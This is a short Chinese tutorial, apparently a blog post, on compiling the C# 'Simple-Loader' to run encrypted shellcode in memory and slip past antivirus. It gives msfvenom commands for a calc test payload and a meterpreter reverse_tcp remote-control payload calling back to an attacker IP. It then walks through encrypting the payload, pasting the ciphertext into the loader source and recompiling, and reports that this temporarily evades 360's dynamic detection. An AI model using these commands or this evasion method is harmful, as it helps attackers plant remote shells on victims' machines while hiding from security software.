环境:
Language: C#
.NET Framework 4.0
Visual Studio 2019 (community)
Build Architecture: x64
Shell Code: MSFVenom windows/exec x32 或者 Cobal Strike x32
生成Payload
calc测试payload
msfvenom -a x86 -p windows/exec cmd=calc.exe -f csharp
或者
msf远控payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f csharp > payload.txt
再或者
编译Simple-Loader
打开Github下载下来的项目后,编译
-e697d8446b3a4495995bb8f162d296b3.png)
运行Simple-Loader
Simple-Loader.exe <path_to_metasploit_payload_txt>
可以看到,软件返回了一个密文结果。
复制该密文结果到Simple-Loader的源码中。
然后重新编译。生成新的Simple-Loader.exe
测试效果
将重新生成好的Simple-Loader.exe直接运行即可
360动态杀毒可以过
但是,过一段时间,360上传分析后,就被杀了。这样的方式只能过一段时间。但是已经很不错了。
原理理解
其实看代码差不多就能理解,也是Bypass的基本操作,利用类似AES加密这样的操作,将Payload进行加密后,再进行解密,并且直接在内存中运行。
参考
Simple-Loader
bypass-windows-defender-with-a-simple-shell-loader